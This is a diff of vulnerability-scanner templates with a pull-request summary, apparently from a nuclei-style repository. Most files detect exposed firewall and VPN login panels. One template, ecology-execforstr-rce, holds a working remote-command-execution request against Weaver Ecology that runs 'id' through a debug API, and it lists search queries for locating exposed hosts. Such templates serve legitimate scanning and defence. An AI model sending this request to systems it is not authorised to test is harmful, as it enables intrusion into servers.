+        # digest: 4a0a0047304502204b169ab9dfa17eeb144714fb1850d1dcf4e8595c77deaa50b3e0881bfa089234022100ba9ad06306655be28214e25a9515428f064e547c36912bae251d0d6833173e71:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/sangfor-ngaf-panel.yaml
+++ b/http/exposed-panels/sangfor-ngaf-panel.yaml
@@ -1,0 +1,28 @@
+id: sangfor-ngaf-panel
+info:
+  name: Sangfor Next-Generation Application Firewall (NGAF) - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Sangfor NGAF is a next-generation application firewall and SSL VPN gateway by
+    Sangfor Technologies. It is widely deployed in APAC and China-based enterprises.
+    The management portal is frequently exposed on non-standard ports.
+  reference:
+    - https://www.sangfor.com/en/product/network-security/next-gen-application-firewall
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "SANGFOR \\| NGAF"})
+    max-request: 1
+    shodan-query: http.title:"SANGFOR | NGAF"
+  tags: detect,firewall,ngaf,panel,sangfor,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'SANGFOR | NGAF'
+        # digest: 490a00463044022043f9300fadcbe743a8da5277758d01f01c56732c6e2f57f23e7ebf028e5a3d0d02205c1d683874d51c768088b9033f584aa6fa4cbee5460d6de135872e535a1d8338:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/silver-peak-edgeconnect-panel.yaml
+++ b/http/exposed-panels/silver-peak-edgeconnect-panel.yaml
@@ -10,7 +10,7 @@ info:
   reference:
     - https://www.arubanetworks.com/products/sd-wan/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Welcome to EdgeConnect"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Welcome to EdgeConnect$"})
     max-request: 1
     shodan-query: 'http.title:"Welcome to EdgeConnect"'
   tags: aruba,edgeconnect,network,panel,sdwan,silver-peak,vpn

--- a/http/exposed-panels/silver-peak-edgeconnect-panel.yaml
+++ b/http/exposed-panels/silver-peak-edgeconnect-panel.yaml
@@ -1,0 +1,33 @@
+id: silver-peak-edgeconnect-panel
+info:
+  name: Silver Peak / HPE Aruba EdgeConnect - Orchestrator Panel
+  author: rxerium
+  severity: info
+  description: |
+    Silver Peak (now HPE Aruba Networking) EdgeConnect SD-WAN Orchestrator is a
+    centralised management platform for EdgeConnect SD-WAN appliances. The web portal
+    is commonly exposed on HTTPS ports including 8443.
+  reference:
+    - https://www.arubanetworks.com/products/sd-wan/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Welcome to EdgeConnect"})
+    max-request: 1
+    shodan-query: 'http.title:"Welcome to EdgeConnect"'
+  tags: aruba,edgeconnect,network,panel,sdwan,silver-peak,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "EdgeConnect"
+          - "Silver Peak"
+          - "silverpeak"
+        condition: or
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 490a0046304402200e0350010aa865b0c4307a869ce35aaf304358c6f06ebd4261c48807b668f03f02200ba686e441da7f222b9038434ff87576c813580d8026a82351bcaaac87734d50:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/smoothwall-firewall-panel.yaml
+++ b/http/exposed-panels/smoothwall-firewall-panel.yaml
@@ -1,0 +1,30 @@
+id: smoothwall-firewall-panel
+info:
+  name: Smoothwall Firewall - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Smoothwall is a UK-based firewall and web filtering appliance commonly deployed in schools, local authorities, and enterprises for internet safety and network security management.
+  reference:
+    - https://www.smoothwall.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Smoothwall"})
+    max-request: 1
+    shodan-query: 'http.title:"Smoothwall"'
+  tags: firewall,panel,smoothwall,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Smoothwall'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 490a00463044022035e88e80c2638e3729621fa3d38ae8ada6779fdc1fc4631c9da061f31318a3a402201d5ef8036cb4e22af874552d444d633b163226da9016f7f91acaca27971533e8:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/smoothwall-firewall-panel.yaml
+++ b/http/exposed-panels/smoothwall-firewall-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.smoothwall.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Smoothwall"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^(?i)Smoothwall"})
     max-request: 1
     shodan-query: 'http.title:"Smoothwall"'
   tags: firewall,panel,smoothwall,vpn

--- a/http/exposed-panels/sonicwall-analytics-panel.yaml
+++ b/http/exposed-panels/sonicwall-analytics-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.sonicwall.com/products/network-security-manager/
   metadata:
-    runzero-match: service["http.body"] matches "SonicWall Analytics"
+    runzero-match: any(each(service["html.titles"]), {# matches "^SonicWall Analytics"})
     max-request: 1
     shodan-query: 'http.html:"SonicWall Analytics"'
   tags: analytics,firewall,panel,sonicwall,vpn

--- a/http/exposed-panels/sonicwall-analytics-panel.yaml
+++ b/http/exposed-panels/sonicwall-analytics-panel.yaml
@@ -1,0 +1,28 @@
+id: sonicwall-analytics-panel
+info:
+  name: SonicWall Analytics - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    SonicWall Analytics (formerly SGMS) is SonicWall's centralised network security analytics and reporting platform used to aggregate and visualise threat data across SonicWall firewall deployments.
+  reference:
+    - https://www.sonicwall.com/products/network-security-manager/
+  metadata:
+    runzero-match: service["http.body"] matches "SonicWall Analytics"
+    max-request: 1
+    shodan-query: 'http.html:"SonicWall Analytics"'
+  tags: analytics,firewall,panel,sonicwall,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'SonicWall Analytics'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a004730450220205f8971342c3a2ab05f11bc870fd08cc5399e3bbbe9f6eb808a4e1b676452850221008c773ac483a18d84e0e551b08074bff1c337d50f6ae375b74d9157ec3dbc141c:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/sophos-utm-panel.yaml
+++ b/http/exposed-panels/sophos-utm-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.sophos.com/en-us/products/unified-threat-management
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "User Portal"})
+    runzero-match: any(each(service["html.titles"]), {# matches "User Portal"}) && service["http.body"] matches "/themes/lite1/"
     max-request: 1
     shodan-query: 'title:"User Portal" ssl:"Sophos"'
   tags: panel,sophos,ssl-vpn,vpn

--- a/http/exposed-panels/sophos-utm-panel.yaml
+++ b/http/exposed-panels/sophos-utm-panel.yaml
@@ -1,0 +1,30 @@
+id: sophos-utm-panel
+info:
+  name: Sophos UTM User Portal - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Sophos UTM (Unified Threat Management) exposes a User Portal interface on ports 8443/5443 for SSL VPN client access and self-service.
+  reference:
+    - https://www.sophos.com/en-us/products/unified-threat-management
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "User Portal"})
+    max-request: 1
+    shodan-query: 'title:"User Portal" ssl:"Sophos"'
+  tags: panel,sophos,ssl-vpn,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>User Portal</title>'
+          - '/themes/lite1/'
+        condition: and
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100d8c08968678a58d13cc1d8e83ba99baae48ae17845f4332a39bf25bbf72c2408022100d6f33f2e53f3f167e9bc59d06635dcd3cbe6f85e3dde2b93c1a4357cdbb69890:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/stormshield-network-security-panel.yaml
+++ b/http/exposed-panels/stormshield-network-security-panel.yaml
@@ -1,0 +1,34 @@
+id: stormshield-network-security-panel
+info:
+  name: Stormshield Network Security - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Stormshield Network Security (SNS) is a French network security appliance providing
+    firewall, IPS, VPN, and web filtering capabilities. Its web management portal is
+    frequently exposed on non-standard ports.
+  reference:
+    - https://www.stormshield.com/products/network-security/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Stormshield Network Security - Portal"})
+    max-request: 3
+    shodan-query: http.title:"Stormshield Network Security - Portal"
+  tags: detect,firewall,network-security,panel,stormshield,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/admin"
+      - "{{BaseURL}}/admin/admin.html"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Stormshield Network Security - Portal'
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100c3bc9c98341d61e8ef038e5dce056e2d84e6cef28bfaeeb5d34851e73db671ba022100a5bef4cf43295c6037492727fac6f328f803bdfe91afca2f0e985ede0ab3524c:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/stormshield-network-security-panel.yaml
+++ b/http/exposed-panels/stormshield-network-security-panel.yaml
@@ -10,7 +10,7 @@ info:
   reference:
     - https://www.stormshield.com/products/network-security/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Stormshield Network Security - Portal"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Stormshield Network Security - Portal$"})
     max-request: 3
     shodan-query: http.title:"Stormshield Network Security - Portal"
   tags: detect,firewall,network-security,panel,stormshield,vpn

--- a/http/exposed-panels/thegreenbowvpn-panel.yaml
+++ b/http/exposed-panels/thegreenbowvpn-panel.yaml
@@ -1,0 +1,30 @@
+id: thegreenbowvpn-panel
+info:
+  name: TheGreenBow VPN - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    TheGreenBow VPN Client login panel detected.
+  reference:
+    - https://www.thegreenbowvpn.com/
+  metadata:
+    runzero-match: service["http.body"] matches "TheGreenBow"
+    max-request: 1
+    shodan-query: 'http.html:"TheGreenBow"'
+  tags: panel,thegreenbowvpn,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'TheGreenBow'
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a004730450220328ddd8a61a0ddf673966f53bccbee08697c37cccd6428e6bac149c0e8bfe8320221009cee7797feb94ec7758d2137a789f487b8d6c5478fe5bad04e19e43443ef4797:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/thegreenbowvpn-panel.yaml
+++ b/http/exposed-panels/thegreenbowvpn-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.thegreenbowvpn.com/
   metadata:
-    runzero-match: service["http.body"] matches "TheGreenBow"
+    runzero-match: service["http.body"] matches `href="/tgb/">ThegreenBow</a>`
     max-request: 1
     shodan-query: 'http.html:"TheGreenBow"'
   tags: panel,thegreenbowvpn,vpn

--- a/http/exposed-panels/trend-micro-deep-security-panel.yaml
+++ b/http/exposed-panels/trend-micro-deep-security-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.trendmicro.com/en_us/business/products/hybrid-cloud/deep-security.html
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Deep Security Manager"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Trend Micro Deep Security Manager"})
     max-request: 1
     shodan-query: 'http.title:"Deep Security Manager"'
   tags: deep-security,panel,trend-micro,vpn

--- a/http/exposed-panels/trend-micro-deep-security-panel.yaml
+++ b/http/exposed-panels/trend-micro-deep-security-panel.yaml
@@ -1,0 +1,30 @@
+id: trend-micro-deep-security-panel
+info:
+  name: Trend Micro Deep Security Manager - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Trend Micro Deep Security Manager is an enterprise server security platform that provides intrusion detection, anti-malware, firewall, and integrity monitoring capabilities for physical, virtual, and cloud environments.
+  reference:
+    - https://www.trendmicro.com/en_us/business/products/hybrid-cloud/deep-security.html
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Deep Security Manager"})
+    max-request: 1
+    shodan-query: 'http.title:"Deep Security Manager"'
+  tags: deep-security,panel,trend-micro,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Trend Micro Deep Security Manager'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 490a0046304402206c7b5edc9fb321a7f898c4f52118d5cfed599d99feeaeb255754d64b8b40c15402204a9b06c8efaae20f4aad613ece53da8c122f67082b7bb8874752296dc03e9afa:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/ubiquiti-edgerouter-panel.yaml
+++ b/http/exposed-panels/ubiquiti-edgerouter-panel.yaml
@@ -1,0 +1,28 @@
+id: ubiquiti-edgerouter-panel
+info:
+  name: Ubiquiti EdgeRouter - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Ubiquiti EdgeRouter is an enterprise-grade router with advanced routing capabilities and VPN features, running EdgeOS (Ubiquiti's Vyatta-based firmware).
+  reference:
+    - https://www.ui.com/edgemax/edgerouter/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "EdgeOS"})
+    max-request: 1
+    shodan-query: 'http.title:"EdgeOS"'
+  tags: edgerouter,panel,router,ubiquiti,vpn
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'EdgeOS'
+        part: body
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022050ab325f541353f2d41abb33ca9809f020fc2e9a0b3de253f02eefc3d7c0a413022100afcfdce46e318c974bfbb9faf0bbec09cc336d9b38b533292e849793cadd9e8d:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/ubiquiti-edgerouter-panel.yaml
+++ b/http/exposed-panels/ubiquiti-edgerouter-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.ui.com/edgemax/edgerouter/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "EdgeOS"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^EdgeOS"})
     max-request: 1
     shodan-query: 'http.title:"EdgeOS"'
   tags: edgerouter,panel,router,ubiquiti,vpn

--- a/http/exposed-panels/unifi-securitygateway-panel.yaml
+++ b/http/exposed-panels/unifi-securitygateway-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.ui.com/
   metadata:
-    runzero-match: service["http.body"] matches "UniFi Security Gateway"
+    runzero-match: any(each(service["html.titles"]), {# matches "^UniFi Security Gateway$"})
     max-request: 1
     shodan-query: 'http.html:"UniFi Security Gateway"'
   tags: panel,securitygateway,ubiquiti,unifi

--- a/http/exposed-panels/unifi-securitygateway-panel.yaml
+++ b/http/exposed-panels/unifi-securitygateway-panel.yaml
@@ -1,0 +1,28 @@
+id: unifi-securitygateway-panel
+info:
+  name: Ubiquiti UniFi Security Gateway - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    Ubiquiti UniFi Security Gateway management panel detected.
+  reference:
+    - https://www.ui.com/
+  metadata:
+    runzero-match: service["http.body"] matches "UniFi Security Gateway"
+    max-request: 1
+    shodan-query: 'http.html:"UniFi Security Gateway"'
+  tags: panel,securitygateway,ubiquiti,unifi
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'UniFi Security Gateway'
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a0047304502201d13ecb8298884b94ec5a5c99fc153ef12677c557882f66156880c2d6a7a1ba3022100d7a69e469c72163db034c3ed897837677c5bcd9f3cf89a48e3134a7eb1372253:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/wg-easy-panel.yaml
+++ b/http/exposed-panels/wg-easy-panel.yaml
@@ -1,0 +1,30 @@
+id: wg-easy-panel
+info:
+  name: WireGuard Easy (wg-easy) - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    wg-easy is the easiest way to run WireGuard VPN with a web-based admin UI.
+    It exposes a management interface for creating and managing WireGuard peers.
+  reference:
+    - https://github.com/wg-easy/wg-easy
+  metadata:
+    runzero-match: service["http.body"] matches "wg-easy"
+    max-request: 1
+    shodan-query: http.html:"wg-easy" http.html:"WireGuard"
+  tags: detect,panel,vpn,wg-easy,wireguard
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'wg-easy'
+        condition: or
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022025f090c883495dc502e757f36154c2fb3f5d187659b07f40a11c3d41d9236940022100846bfdf8acbf5094ff85aeaeb12679f833c4f919a9022111e5937a9c80990492:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/zywall-usg-panel.yaml
+++ b/http/exposed-panels/zywall-usg-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.zyxel.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "ZyWALL"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^ZyWALL"})
     max-request: 1
     shodan-query: 'http.title:"ZyWALL"'
   tags: firewall,panel,zywall,zyxel

--- a/http/exposed-panels/zywall-usg-panel.yaml
+++ b/http/exposed-panels/zywall-usg-panel.yaml
@@ -1,0 +1,28 @@
+id: zywall-usg-panel
+info:
+  name: ZyXEL ZyWALL USG - Login Panel
+  author: rxerium
+  severity: info
+  description: |
+    ZyXEL ZyWALL USG firewall login panel detected.
+  reference:
+    - https://www.zyxel.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "ZyWALL"})
+    max-request: 1
+    shodan-query: 'http.title:"ZyWALL"'
+  tags: firewall,panel,zywall,zyxel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ZyWALL USG'
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022100a5731a5660bea113cdcc5862b0f5e4dc51d81d9c3ca790800b4598c67642f39c02203d959172f1f3acf5632055463150b1b41b6cb605d9147e709e18fe694fe584e2:922c64590222798bb761d5b6d8e72950

--- a/http/vulnerabilities/weaver/ecology/ecology-execforstr-rce.yaml
+++ b/http/vulnerabilities/weaver/ecology/ecology-execforstr-rce.yaml
@@ -1,0 +1,42 @@
+id: ecology-execforstr-rce
+info:
+  name: Weaver Ecology ExecForStr Remote Command Execution
+  author: DhiyaneshDk
+  severity: critical
+  description: |
+    Weaver Ecology exposes a debug API endpoint that allows invocation of `cn.hutool.core.util.RuntimeUtil.execForStr`, resulting in remote command execution. Successful exploitation allows an attacker to execute arbitrary operating system commands on the target server.
+  metadata:
+    runzero-match: service["http.body"] matches "/build/ecodesdk/static/js/lib\\.js"
+    fofa-query: body="/build/ecodesdk/static/js/lib.js"
+    max-request: 1
+    product: ecology
+    vendor: weaver
+    verified: true
+  tags: dubbo,ecology,hutool,rce,weaver
+http:
+  - raw:
+      - |
+        POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        [["id"]]
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'uid=([0-9(a-z) ]+)gid=([0-9(a-z) ]+)'
+      - type: word
+        part: content_type
+        words:
+          - 'application/json'
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - '((u|g)id|groups)=[^\r\n"]+'
+        # digest: 4b0a00483046022100ae84bf202ab541e2624a0ff225dc26aeb014d8b6f3ebea5fd02cb94c895ebdf002210087f8d4de19811ce3553762bb635533aa4eed7104d2980eb0e4af32f4cf2fa07e:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Upstream Sync — Semantic Changes

> Targets the general branch. Review before merging.

### New templates — auto-generated match (31)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/exposed-panels/fortinet-fortianalyzer-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/sangfor-ngaf-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/aruba-via-vpn-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/netgate-pfsenseplus-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/cyberoam-firewall-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/zywall-usg-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/jotty-page-login-panel.yaml` | ⚪ info | panel, login | — |
| `http/exposed-panels/endian-firewall-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/sonicwall-analytics-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/sophos-utm-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/ecessa-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/nuage-networks-vsp-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/peplink-incontrol-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/ocserv-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/trend-micro-deep-security-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/wg-easy-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/netsweeper-webadmin-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/cradlepoint-gateway-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/stormshield-network-security-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/sangfor-iam-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/firemon-asset-manager-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/array-networks-ssl-vpn-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/smoothwall-firewall-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/silver-peak-edgeconnect-panel.yaml` | ⚪ info | panel | — |
| `http/vulnerabilities/weaver/ecology/ecology-execforstr-rce.yaml` | 🔴 critical | — | — |
| `http/exposed-panels/headscale-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/ubiquiti-edgerouter-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/ddwrt-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/thegreenbowvpn-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/unifi-securitygateway-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/elfiq-panel.yaml` | ⚪ info | panel | — |

### New templates — needs manual annotation (1)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/exposed-panels/hillstone-ssl-vpn-panel.yaml` | ⚪ info | panel | — |

---

### ⚠️ Action items (32)

- [x] `http/exposed-panels/array-networks-ssl-vpn-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/aruba-via-vpn-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/cradlepoint-gateway-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/cyberoam-firewall-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/ddwrt-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/ecessa-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/elfiq-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/endian-firewall-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/firemon-asset-manager-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/fortinet-fortianalyzer-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/headscale-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/hillstone-ssl-vpn-panel.yaml` — panel info; no predicate could be generated
- [x] `http/exposed-panels/jotty-page-login-panel.yaml` — auto-generated `runzero-match` (panel, login info); please verify
- [x] `http/exposed-panels/netgate-pfsenseplus-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/netsweeper-webadmin-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/nuage-networks-vsp-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/ocserv-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/peplink-incontrol-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/sangfor-iam-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/sangfor-ngaf-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/silver-peak-edgeconnect-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/smoothwall-firewall-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/sonicwall-analytics-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/sophos-utm-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/stormshield-network-security-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/thegreenbowvpn-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/trend-micro-deep-security-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/ubiquiti-edgerouter-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/unifi-securitygateway-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/wg-easy-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/zywall-usg-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/vulnerabilities/weaver/ecology/ecology-execforstr-rce.yaml` — auto-generated `runzero-match` (critical); please verify
